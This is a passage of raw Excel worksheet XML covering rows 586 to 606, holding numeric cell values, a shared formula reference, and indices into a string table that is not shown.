      </c>
      <c r="AB586" s="38" t="s">
        <v>2792</v>
      </c>
      <c r="AC586" s="40">
        <v>172791.0</v>
      </c>
      <c r="AD586" s="5"/>
      <c r="AE586" s="14"/>
      <c r="AF586" s="14"/>
    </row>
    <row r="587">
      <c r="A587" s="6">
        <f t="shared" si="1"/>
        <v>0.7646975405</v>
      </c>
      <c r="B587" s="29">
        <v>1.0</v>
      </c>
      <c r="C587" s="15"/>
      <c r="D587" s="14"/>
      <c r="E587" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F587" s="14"/>
      <c r="G587" s="29">
        <v>5.0</v>
      </c>
      <c r="H587" s="29">
        <v>11192.0</v>
      </c>
      <c r="I587" s="29">
        <v>45483.0</v>
      </c>
      <c r="J587" s="15"/>
      <c r="K587" s="29">
        <v>28137.0</v>
      </c>
      <c r="L587" s="15"/>
      <c r="M587" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N587" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O587" s="29">
        <v>3.0</v>
      </c>
      <c r="P587" s="29">
        <v>4.0</v>
      </c>
      <c r="Q587" s="15"/>
      <c r="R587" s="15"/>
      <c r="S587" s="15"/>
      <c r="T587" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U587" s="5"/>
      <c r="V587" s="5"/>
      <c r="W587" s="47"/>
      <c r="X587" s="45"/>
      <c r="Y587" s="45"/>
      <c r="Z587" s="38" t="s">
        <v>2793</v>
      </c>
      <c r="AA587" s="39" t="s">
        <v>2794</v>
      </c>
      <c r="AB587" s="38" t="s">
        <v>2795</v>
      </c>
      <c r="AC587" s="40">
        <v>56716.0</v>
      </c>
      <c r="AD587" s="5"/>
      <c r="AE587" s="14"/>
      <c r="AF587" s="14"/>
    </row>
    <row r="588">
      <c r="A588" s="6">
        <f t="shared" si="1"/>
        <v>0.4537969766</v>
      </c>
      <c r="B588" s="29">
        <v>1.0</v>
      </c>
      <c r="C588" s="15"/>
      <c r="D588" s="14"/>
      <c r="E588" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F588" s="14"/>
      <c r="G588" s="29">
        <v>0.0</v>
      </c>
      <c r="H588" s="29">
        <v>399.0</v>
      </c>
      <c r="I588" s="29">
        <v>289044.0</v>
      </c>
      <c r="J588" s="15"/>
      <c r="K588" s="29">
        <v>289044.0</v>
      </c>
      <c r="L588" s="15"/>
      <c r="M588" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N588" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O588" s="29">
        <v>4.0</v>
      </c>
      <c r="P588" s="29">
        <v>4.0</v>
      </c>
      <c r="Q588" s="15"/>
      <c r="R588" s="15"/>
      <c r="S588" s="15"/>
      <c r="T588" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U588" s="5"/>
      <c r="V588" s="5"/>
      <c r="W588" s="47"/>
      <c r="X588" s="45"/>
      <c r="Y588" s="45"/>
      <c r="Z588" s="38" t="s">
        <v>2796</v>
      </c>
      <c r="AA588" s="39" t="s">
        <v>2797</v>
      </c>
      <c r="AB588" s="38" t="s">
        <v>2798</v>
      </c>
      <c r="AC588" s="40">
        <v>268286.0</v>
      </c>
      <c r="AD588" s="5"/>
      <c r="AE588" s="14"/>
      <c r="AF588" s="14"/>
    </row>
    <row r="589">
      <c r="A589" s="6">
        <f t="shared" si="1"/>
        <v>0.6758395467</v>
      </c>
      <c r="B589" s="29">
        <v>1.0</v>
      </c>
      <c r="C589" s="15"/>
      <c r="D589" s="14"/>
      <c r="E589" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F589" s="14"/>
      <c r="G589" s="29">
        <v>2.0</v>
      </c>
      <c r="H589" s="29">
        <v>994.0</v>
      </c>
      <c r="I589" s="29">
        <v>102976.0</v>
      </c>
      <c r="J589" s="15"/>
      <c r="K589" s="15"/>
      <c r="L589" s="15"/>
      <c r="M589" s="15"/>
      <c r="N589" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O589" s="29">
        <v>2.0</v>
      </c>
      <c r="P589" s="29">
        <v>0.0</v>
      </c>
      <c r="Q589" s="15"/>
      <c r="R589" s="15"/>
      <c r="S589" s="15"/>
      <c r="T589" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U589" s="5"/>
      <c r="V589" s="5"/>
      <c r="W589" s="47"/>
      <c r="X589" s="45"/>
      <c r="Y589" s="45"/>
      <c r="Z589" s="38" t="s">
        <v>2799</v>
      </c>
      <c r="AA589" s="39" t="s">
        <v>2800</v>
      </c>
      <c r="AB589" s="38" t="s">
        <v>2801</v>
      </c>
      <c r="AC589" s="40">
        <v>116085.0</v>
      </c>
      <c r="AD589" s="5"/>
      <c r="AE589" s="14"/>
      <c r="AF589" s="14"/>
    </row>
    <row r="590">
      <c r="A590" s="6">
        <f t="shared" si="1"/>
        <v>0.6790589837</v>
      </c>
      <c r="B590" s="29">
        <v>1.0</v>
      </c>
      <c r="C590" s="29">
        <v>62584.0</v>
      </c>
      <c r="D590" s="14"/>
      <c r="E590" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F590" s="14"/>
      <c r="G590" s="29">
        <v>2.0</v>
      </c>
      <c r="H590" s="29">
        <v>3862.0</v>
      </c>
      <c r="I590" s="29">
        <v>50506.0</v>
      </c>
      <c r="J590" s="15"/>
      <c r="K590" s="29">
        <v>21426.0</v>
      </c>
      <c r="L590" s="15"/>
      <c r="M590" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N590" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O590" s="29">
        <v>1.0</v>
      </c>
      <c r="P590" s="29">
        <v>0.0</v>
      </c>
      <c r="Q590" s="15"/>
      <c r="R590" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S590" s="15"/>
      <c r="T590" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U590" s="5"/>
      <c r="V590" s="5"/>
      <c r="W590" s="47"/>
      <c r="X590" s="45"/>
      <c r="Y590" s="45"/>
      <c r="Z590" s="38" t="s">
        <v>2802</v>
      </c>
      <c r="AA590" s="39" t="s">
        <v>2803</v>
      </c>
      <c r="AB590" s="38" t="s">
        <v>2804</v>
      </c>
      <c r="AC590" s="40">
        <v>62579.0</v>
      </c>
      <c r="AD590" s="5"/>
      <c r="AE590" s="14"/>
      <c r="AF590" s="14"/>
    </row>
    <row r="591">
      <c r="A591" s="6">
        <f t="shared" si="1"/>
        <v>0.3896130236</v>
      </c>
      <c r="B591" s="29">
        <v>1.0</v>
      </c>
      <c r="C591" s="15"/>
      <c r="D591" s="14"/>
      <c r="E591" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F591" s="14"/>
      <c r="G591" s="29">
        <v>2.0</v>
      </c>
      <c r="H591" s="29">
        <v>292.0</v>
      </c>
      <c r="I591" s="29">
        <v>3927.0</v>
      </c>
      <c r="J591" s="15"/>
      <c r="K591" s="29">
        <v>3927.0</v>
      </c>
      <c r="L591" s="15"/>
      <c r="M591" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N591" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O591" s="29">
        <v>1.0</v>
      </c>
      <c r="P591" s="29">
        <v>2.0</v>
      </c>
      <c r="Q591" s="15"/>
      <c r="R591" s="15"/>
      <c r="S591" s="15"/>
      <c r="T591" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U591" s="5"/>
      <c r="V591" s="5"/>
      <c r="W591" s="47"/>
      <c r="X591" s="45"/>
      <c r="Y591" s="45"/>
      <c r="Z591" s="38" t="s">
        <v>2805</v>
      </c>
      <c r="AA591" s="39" t="s">
        <v>2806</v>
      </c>
      <c r="AB591" s="38" t="s">
        <v>2807</v>
      </c>
      <c r="AC591" s="40">
        <v>223530.0</v>
      </c>
      <c r="AD591" s="5"/>
      <c r="AE591" s="14"/>
      <c r="AF591" s="14"/>
    </row>
    <row r="592">
      <c r="A592" s="6">
        <f t="shared" si="1"/>
        <v>0.6746492612</v>
      </c>
      <c r="B592" s="29">
        <v>1.0</v>
      </c>
      <c r="C592" s="29">
        <v>230811.0</v>
      </c>
      <c r="D592" s="14"/>
      <c r="E592" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F592" s="14"/>
      <c r="G592" s="29">
        <v>16.0</v>
      </c>
      <c r="H592" s="29">
        <v>63475.0</v>
      </c>
      <c r="I592" s="29">
        <v>83914.0</v>
      </c>
      <c r="J592" s="15"/>
      <c r="K592" s="29">
        <v>83914.0</v>
      </c>
      <c r="L592" s="15"/>
      <c r="M592" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N592" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O592" s="29">
        <v>2.0</v>
      </c>
      <c r="P592" s="29">
        <v>2.0</v>
      </c>
      <c r="Q592" s="15"/>
      <c r="R592" s="15"/>
      <c r="S592" s="15"/>
      <c r="T592" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U592" s="5"/>
      <c r="V592" s="5"/>
      <c r="W592" s="47"/>
      <c r="X592" s="45"/>
      <c r="Y592" s="45"/>
      <c r="Z592" s="38" t="s">
        <v>2808</v>
      </c>
      <c r="AA592" s="39" t="s">
        <v>2809</v>
      </c>
      <c r="AB592" s="38" t="s">
        <v>2810</v>
      </c>
      <c r="AC592" s="40">
        <v>134514.0</v>
      </c>
      <c r="AD592" s="5"/>
      <c r="AE592" s="14"/>
      <c r="AF592" s="14"/>
    </row>
    <row r="593">
      <c r="A593" s="6">
        <f t="shared" si="1"/>
        <v>0.5857422499</v>
      </c>
      <c r="B593" s="29">
        <v>1.0</v>
      </c>
      <c r="C593" s="14"/>
      <c r="D593" s="14"/>
      <c r="E593" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F593" s="14"/>
      <c r="G593" s="29">
        <v>1.0</v>
      </c>
      <c r="H593" s="29">
        <v>1013.0</v>
      </c>
      <c r="I593" s="29">
        <v>5939.0</v>
      </c>
      <c r="J593" s="15"/>
      <c r="K593" s="29">
        <v>-1.0</v>
      </c>
      <c r="L593" s="15"/>
      <c r="M593" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N593" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O593" s="29">
        <v>2.0</v>
      </c>
      <c r="P593" s="29">
        <v>2.0</v>
      </c>
      <c r="Q593" s="15"/>
      <c r="R593" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S593" s="15"/>
      <c r="T593" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U593" s="5"/>
      <c r="V593" s="5"/>
      <c r="W593" s="47"/>
      <c r="X593" s="45"/>
      <c r="Y593" s="45"/>
      <c r="Z593" s="38" t="s">
        <v>2811</v>
      </c>
      <c r="AA593" s="39" t="s">
        <v>2812</v>
      </c>
      <c r="AB593" s="38" t="s">
        <v>2813</v>
      </c>
      <c r="AC593" s="40">
        <v>9047.0</v>
      </c>
      <c r="AD593" s="5"/>
      <c r="AE593" s="14"/>
      <c r="AF593" s="14"/>
    </row>
    <row r="594">
      <c r="A594" s="6">
        <f t="shared" si="1"/>
        <v>0.907073835</v>
      </c>
      <c r="B594" s="29">
        <v>1.0</v>
      </c>
      <c r="C594" s="29">
        <v>258897.0</v>
      </c>
      <c r="D594" s="14"/>
      <c r="E594" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F594" s="14"/>
      <c r="G594" s="29">
        <v>0.0</v>
      </c>
      <c r="H594" s="29">
        <v>972.0</v>
      </c>
      <c r="I594" s="29">
        <v>124045.0</v>
      </c>
      <c r="J594" s="15"/>
      <c r="K594" s="15"/>
      <c r="L594" s="15"/>
      <c r="M594" s="14"/>
      <c r="N594" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O594" s="29">
        <v>1.0</v>
      </c>
      <c r="P594" s="29">
        <v>0.0</v>
      </c>
      <c r="Q594" s="15"/>
      <c r="R594" s="15"/>
      <c r="S594" s="15"/>
      <c r="T594" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U594" s="5"/>
      <c r="V594" s="5"/>
      <c r="W594" s="47"/>
      <c r="X594" s="45"/>
      <c r="Y594" s="45"/>
      <c r="Z594" s="38" t="s">
        <v>2814</v>
      </c>
      <c r="AA594" s="39" t="s">
        <v>2815</v>
      </c>
      <c r="AB594" s="38" t="s">
        <v>2816</v>
      </c>
      <c r="AC594" s="40">
        <v>258896.0</v>
      </c>
      <c r="AD594" s="5"/>
      <c r="AE594" s="14"/>
      <c r="AF594" s="14"/>
    </row>
    <row r="595">
      <c r="A595" s="6">
        <f t="shared" si="1"/>
        <v>0.142225894</v>
      </c>
      <c r="B595" s="29">
        <v>1.0</v>
      </c>
      <c r="C595" s="29">
        <v>159270.0</v>
      </c>
      <c r="D595" s="14"/>
      <c r="E595" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F595" s="14"/>
      <c r="G595" s="29">
        <v>5.0</v>
      </c>
      <c r="H595" s="29">
        <v>320.0</v>
      </c>
      <c r="I595" s="29">
        <v>12012.0</v>
      </c>
      <c r="J595" s="15"/>
      <c r="K595" s="29">
        <v>37315.0</v>
      </c>
      <c r="L595" s="15"/>
      <c r="M595" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N595" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O595" s="29">
        <v>1.0</v>
      </c>
      <c r="P595" s="29">
        <v>2.0</v>
      </c>
      <c r="Q595" s="15"/>
      <c r="R595" s="15"/>
      <c r="S595" s="15"/>
      <c r="T595" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U595" s="5"/>
      <c r="V595" s="5"/>
      <c r="W595" s="47"/>
      <c r="X595" s="45"/>
      <c r="Y595" s="45"/>
      <c r="Z595" s="38" t="s">
        <v>2817</v>
      </c>
      <c r="AA595" s="39" t="s">
        <v>2818</v>
      </c>
      <c r="AB595" s="38" t="s">
        <v>1397</v>
      </c>
      <c r="AC595" s="40">
        <v>159264.0</v>
      </c>
      <c r="AD595" s="5"/>
      <c r="AE595" s="14"/>
      <c r="AF595" s="14"/>
    </row>
    <row r="596">
      <c r="A596" s="6">
        <f t="shared" si="1"/>
        <v>0.4789704405</v>
      </c>
      <c r="B596" s="29">
        <v>1.0</v>
      </c>
      <c r="C596" s="14"/>
      <c r="D596" s="14"/>
      <c r="E596" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F596" s="14"/>
      <c r="G596" s="29">
        <v>0.0</v>
      </c>
      <c r="H596" s="29">
        <v>3847.0</v>
      </c>
      <c r="I596" s="29">
        <v>49984.0</v>
      </c>
      <c r="J596" s="15"/>
      <c r="K596" s="29">
        <v>-1.0</v>
      </c>
      <c r="L596" s="15"/>
      <c r="M596" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N596" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O596" s="29">
        <v>1.0</v>
      </c>
      <c r="P596" s="29">
        <v>4.0</v>
      </c>
      <c r="Q596" s="15"/>
      <c r="R596" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S596" s="15"/>
      <c r="T596" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U596" s="5"/>
      <c r="V596" s="5"/>
      <c r="W596" s="47"/>
      <c r="X596" s="45"/>
      <c r="Y596" s="45"/>
      <c r="Z596" s="38" t="s">
        <v>2819</v>
      </c>
      <c r="AA596" s="39" t="s">
        <v>2820</v>
      </c>
      <c r="AB596" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC596" s="40">
        <v>61980.0</v>
      </c>
      <c r="AD596" s="5"/>
      <c r="AE596" s="14"/>
      <c r="AF596" s="14"/>
    </row>
    <row r="597">
      <c r="A597" s="6">
        <f t="shared" si="1"/>
        <v>0.8135408439</v>
      </c>
      <c r="B597" s="29">
        <v>1.0</v>
      </c>
      <c r="C597" s="29">
        <v>185940.0</v>
      </c>
      <c r="D597" s="14"/>
      <c r="E597" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F597" s="14"/>
      <c r="G597" s="29">
        <v>3.0</v>
      </c>
      <c r="H597" s="29">
        <v>1608.0</v>
      </c>
      <c r="I597" s="29">
        <v>135190.0</v>
      </c>
      <c r="J597" s="15"/>
      <c r="K597" s="29">
        <v>135190.0</v>
      </c>
      <c r="L597" s="15"/>
      <c r="M597" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N597" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O597" s="29">
        <v>1.0</v>
      </c>
      <c r="P597" s="29">
        <v>5.0</v>
      </c>
      <c r="Q597" s="15"/>
      <c r="R597" s="15"/>
      <c r="S597" s="15"/>
      <c r="T597" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U597" s="5"/>
      <c r="V597" s="5"/>
      <c r="W597" s="47"/>
      <c r="X597" s="45"/>
      <c r="Y597" s="45"/>
      <c r="Z597" s="38" t="s">
        <v>2821</v>
      </c>
      <c r="AA597" s="39" t="s">
        <v>2822</v>
      </c>
      <c r="AB597" s="38" t="s">
        <v>2823</v>
      </c>
      <c r="AC597" s="40">
        <v>185925.0</v>
      </c>
      <c r="AD597" s="5"/>
      <c r="AE597" s="14"/>
      <c r="AF597" s="14"/>
    </row>
    <row r="598">
      <c r="A598" s="6">
        <f t="shared" si="1"/>
        <v>0.2041259758</v>
      </c>
      <c r="B598" s="29">
        <v>1.0</v>
      </c>
      <c r="C598" s="14"/>
      <c r="D598" s="14"/>
      <c r="E598" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F598" s="14"/>
      <c r="G598" s="29">
        <v>0.0</v>
      </c>
      <c r="H598" s="29">
        <v>147.0</v>
      </c>
      <c r="I598" s="29">
        <v>11447.0</v>
      </c>
      <c r="J598" s="15"/>
      <c r="K598" s="29">
        <v>11447.0</v>
      </c>
      <c r="L598" s="15"/>
      <c r="M598" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N598" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O598" s="29">
        <v>0.0</v>
      </c>
      <c r="P598" s="29">
        <v>2.0</v>
      </c>
      <c r="Q598" s="15"/>
      <c r="R598" s="15"/>
      <c r="S598" s="15"/>
      <c r="T598" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U598" s="5"/>
      <c r="V598" s="5"/>
      <c r="W598" s="47"/>
      <c r="X598" s="45"/>
      <c r="Y598" s="45"/>
      <c r="Z598" s="38" t="s">
        <v>2824</v>
      </c>
      <c r="AA598" s="39" t="s">
        <v>2825</v>
      </c>
      <c r="AB598" s="38" t="s">
        <v>2826</v>
      </c>
      <c r="AC598" s="40">
        <v>207865.0</v>
      </c>
      <c r="AD598" s="5"/>
      <c r="AE598" s="14"/>
      <c r="AF598" s="14"/>
    </row>
    <row r="599">
      <c r="A599" s="6">
        <f t="shared" si="1"/>
        <v>0.6733016355</v>
      </c>
      <c r="B599" s="29">
        <v>1.0</v>
      </c>
      <c r="C599" s="29">
        <v>204511.0</v>
      </c>
      <c r="D599" s="14"/>
      <c r="E599" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F599" s="14"/>
      <c r="G599" s="29">
        <v>1.0</v>
      </c>
      <c r="H599" s="29">
        <v>191.0</v>
      </c>
      <c r="I599" s="29">
        <v>199211.0</v>
      </c>
      <c r="J599" s="15"/>
      <c r="K599" s="29">
        <v>71850.0</v>
      </c>
      <c r="L599" s="14"/>
      <c r="M599" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N599" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O599" s="29">
        <v>1.0</v>
      </c>
      <c r="P599" s="29">
        <v>0.0</v>
      </c>
      <c r="Q599" s="15"/>
      <c r="R599" s="15"/>
      <c r="S599" s="15"/>
      <c r="T599" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U599" s="5"/>
      <c r="V599" s="5"/>
      <c r="W599" s="47"/>
      <c r="X599" s="45"/>
      <c r="Y599" s="45"/>
      <c r="Z599" s="38" t="s">
        <v>2827</v>
      </c>
      <c r="AA599" s="39" t="s">
        <v>2828</v>
      </c>
      <c r="AB599" s="38" t="s">
        <v>2829</v>
      </c>
      <c r="AC599" s="40">
        <v>204497.0</v>
      </c>
      <c r="AD599" s="5"/>
      <c r="AE599" s="14"/>
      <c r="AF599" s="14"/>
    </row>
    <row r="600">
      <c r="A600" s="6">
        <f t="shared" si="1"/>
        <v>0.05097785234</v>
      </c>
      <c r="B600" s="29">
        <v>1.0</v>
      </c>
      <c r="C600" s="15"/>
      <c r="D600" s="14"/>
      <c r="E600" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F600" s="14"/>
      <c r="G600" s="29">
        <v>5.0</v>
      </c>
      <c r="H600" s="29">
        <v>837.0</v>
      </c>
      <c r="I600" s="29">
        <v>42015.0</v>
      </c>
      <c r="J600" s="15"/>
      <c r="K600" s="15"/>
      <c r="L600" s="15"/>
      <c r="M600" s="14"/>
      <c r="N600" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O600" s="29">
        <v>0.0</v>
      </c>
      <c r="P600" s="29">
        <v>0.0</v>
      </c>
      <c r="Q600" s="15"/>
      <c r="R600" s="15"/>
      <c r="S600" s="15"/>
      <c r="T600" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U600" s="5"/>
      <c r="V600" s="5"/>
      <c r="W600" s="47"/>
      <c r="X600" s="45"/>
      <c r="Y600" s="45"/>
      <c r="Z600" s="38" t="s">
        <v>2830</v>
      </c>
      <c r="AA600" s="39" t="s">
        <v>2831</v>
      </c>
      <c r="AB600" s="38" t="s">
        <v>2832</v>
      </c>
      <c r="AC600" s="40">
        <v>257558.0</v>
      </c>
      <c r="AD600" s="5"/>
      <c r="AE600" s="14"/>
      <c r="AF600" s="14"/>
    </row>
    <row r="601">
      <c r="A601" s="6">
        <f t="shared" si="1"/>
        <v>0.4109413366</v>
      </c>
      <c r="B601" s="29">
        <v>1.0</v>
      </c>
      <c r="C601" s="14"/>
      <c r="D601" s="14"/>
      <c r="E601" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F601" s="14"/>
      <c r="G601" s="29">
        <v>0.0</v>
      </c>
      <c r="H601" s="29">
        <v>52.0</v>
      </c>
      <c r="I601" s="29">
        <v>277760.0</v>
      </c>
      <c r="J601" s="15"/>
      <c r="K601" s="29">
        <v>277760.0</v>
      </c>
      <c r="L601" s="15"/>
      <c r="M601" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N601" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O601" s="29">
        <v>0.0</v>
      </c>
      <c r="P601" s="29">
        <v>4.0</v>
      </c>
      <c r="Q601" s="15"/>
      <c r="R601" s="15"/>
      <c r="S601" s="15"/>
      <c r="T601" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U601" s="5"/>
      <c r="V601" s="5"/>
      <c r="W601" s="47"/>
      <c r="X601" s="45"/>
      <c r="Y601" s="45"/>
      <c r="Z601" s="38" t="s">
        <v>2833</v>
      </c>
      <c r="AA601" s="39" t="s">
        <v>2834</v>
      </c>
      <c r="AB601" s="38" t="s">
        <v>2692</v>
      </c>
      <c r="AC601" s="40">
        <v>266055.0</v>
      </c>
      <c r="AD601" s="5"/>
      <c r="AE601" s="14"/>
      <c r="AF601" s="14"/>
    </row>
    <row r="602">
      <c r="A602" s="6">
        <f t="shared" si="1"/>
        <v>0.1466985735</v>
      </c>
      <c r="B602" s="29">
        <v>1.0</v>
      </c>
      <c r="C602" s="14"/>
      <c r="D602" s="14"/>
      <c r="E602" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F602" s="14"/>
      <c r="G602" s="29">
        <v>0.0</v>
      </c>
      <c r="H602" s="29">
        <v>841.0</v>
      </c>
      <c r="I602" s="29">
        <v>8836.0</v>
      </c>
      <c r="J602" s="15"/>
      <c r="K602" s="29">
        <v>88961.0</v>
      </c>
      <c r="L602" s="15"/>
      <c r="M602" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N602" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O602" s="29">
        <v>1.0</v>
      </c>
      <c r="P602" s="29">
        <v>5.0</v>
      </c>
      <c r="Q602" s="15"/>
      <c r="R602" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S602" s="15"/>
      <c r="T602" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U602" s="5"/>
      <c r="V602" s="5"/>
      <c r="W602" s="47"/>
      <c r="X602" s="45"/>
      <c r="Y602" s="45"/>
      <c r="Z602" s="38" t="s">
        <v>2835</v>
      </c>
      <c r="AA602" s="39" t="s">
        <v>2836</v>
      </c>
      <c r="AB602" s="38" t="s">
        <v>2837</v>
      </c>
      <c r="AC602" s="40">
        <v>136717.0</v>
      </c>
      <c r="AD602" s="5"/>
      <c r="AE602" s="14"/>
      <c r="AF602" s="14"/>
    </row>
    <row r="603">
      <c r="A603" s="6">
        <f t="shared" si="1"/>
        <v>0.9258649705</v>
      </c>
      <c r="B603" s="29">
        <v>1.0</v>
      </c>
      <c r="C603" s="15"/>
      <c r="D603" s="14"/>
      <c r="E603" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F603" s="14"/>
      <c r="G603" s="29">
        <v>7.0</v>
      </c>
      <c r="H603" s="29">
        <v>624.0</v>
      </c>
      <c r="I603" s="29">
        <v>27502.0</v>
      </c>
      <c r="J603" s="15"/>
      <c r="K603" s="15"/>
      <c r="L603" s="15"/>
      <c r="M603" s="14"/>
      <c r="N603" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O603" s="29">
        <v>1.0</v>
      </c>
      <c r="P603" s="29">
        <v>1.0</v>
      </c>
      <c r="Q603" s="15"/>
      <c r="R603" s="15"/>
      <c r="S603" s="15"/>
      <c r="T603" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U603" s="5"/>
      <c r="V603" s="5"/>
      <c r="W603" s="47"/>
      <c r="X603" s="45"/>
      <c r="Y603" s="45"/>
      <c r="Z603" s="38" t="s">
        <v>2838</v>
      </c>
      <c r="AA603" s="39" t="s">
        <v>2839</v>
      </c>
      <c r="AB603" s="38" t="s">
        <v>2840</v>
      </c>
      <c r="AC603" s="40">
        <v>37842.0</v>
      </c>
      <c r="AD603" s="5"/>
      <c r="AE603" s="14"/>
      <c r="AF603" s="14"/>
    </row>
    <row r="604">
      <c r="A604" s="6">
        <f t="shared" si="1"/>
        <v>0.6392210113</v>
      </c>
      <c r="B604" s="29">
        <v>1.0</v>
      </c>
      <c r="C604" s="15"/>
      <c r="D604" s="14"/>
      <c r="E604" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F604" s="14"/>
      <c r="G604" s="29">
        <v>3.0</v>
      </c>
      <c r="H604" s="29">
        <v>1256.0</v>
      </c>
      <c r="I604" s="29">
        <v>89905.0</v>
      </c>
      <c r="J604" s="15"/>
      <c r="K604" s="15"/>
      <c r="L604" s="15"/>
      <c r="M604" s="15"/>
      <c r="N604" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O604" s="29">
        <v>0.0</v>
      </c>
      <c r="P604" s="29">
        <v>2.0</v>
      </c>
      <c r="Q604" s="15"/>
      <c r="R604" s="15"/>
      <c r="S604" s="15"/>
      <c r="T604" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U604" s="5"/>
      <c r="V604" s="5"/>
      <c r="W604" s="47"/>
      <c r="X604" s="45"/>
      <c r="Y604" s="45"/>
      <c r="Z604" s="38" t="s">
        <v>2841</v>
      </c>
      <c r="AA604" s="39" t="s">
        <v>2842</v>
      </c>
      <c r="AB604" s="38" t="s">
        <v>2843</v>
      </c>
      <c r="AC604" s="40">
        <v>104536.0</v>
      </c>
      <c r="AD604" s="5"/>
      <c r="AE604" s="14"/>
      <c r="AF604" s="14"/>
    </row>
    <row r="605">
      <c r="A605" s="6">
        <f t="shared" si="1"/>
        <v>0.1776058685</v>
      </c>
      <c r="B605" s="29">
        <v>1.0</v>
      </c>
      <c r="C605" s="14"/>
      <c r="D605" s="14"/>
      <c r="E605" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F605" s="14"/>
      <c r="G605" s="29">
        <v>7.0</v>
      </c>
      <c r="H605" s="29">
        <v>3146.0</v>
      </c>
      <c r="I605" s="29">
        <v>84397.0</v>
      </c>
      <c r="J605" s="15"/>
      <c r="K605" s="15"/>
      <c r="L605" s="5" t="s">
        <v>1241</v>
      </c>
      <c r="M605" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N605" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O605" s="29">
        <v>3.0</v>
      </c>
      <c r="P605" s="29">
        <v>1.0</v>
      </c>
      <c r="Q605" s="15"/>
      <c r="R605" s="15"/>
      <c r="S605" s="15"/>
      <c r="T605" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U605" s="5"/>
      <c r="V605" s="5"/>
      <c r="W605" s="47"/>
      <c r="X605" s="45"/>
      <c r="Y605" s="45"/>
      <c r="Z605" s="38" t="s">
        <v>2844</v>
      </c>
      <c r="AA605" s="39" t="s">
        <v>2845</v>
      </c>
      <c r="AB605" s="38" t="s">
        <v>1397</v>
      </c>
      <c r="AC605" s="40">
        <v>97873.0</v>
      </c>
      <c r="AD605" s="5"/>
      <c r="AE605" s="14"/>
      <c r="AF605" s="14"/>
    </row>
    <row r="606">
      <c r="A606" s="6">
        <f t="shared" si="1"/>
        <v>0.4014252051</v>
      </c>
      <c r="B606" s="29">
        <v>1.0</v>
      </c>
      <c r="C606" s="15"/>
      <c r="D606" s="14"/>
      <c r="E606" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F606" s="14"/>
      <c r="G606" s="29">
        <v>23.0</v>
      </c>
      <c r="H606" s="29">
        <v>6502.0</v>
      </c>
      <c r="I606" s="29">
        <v>173652.0</v>
      </c>
      <c r="J606" s="15"/>
      <c r="K606" s="29">
        <v>173652.0</v>
      </c>
      <c r="L606" s="15"/>
      <c r="M606" s="36" t="s">
        <v>30</v>
      </c>
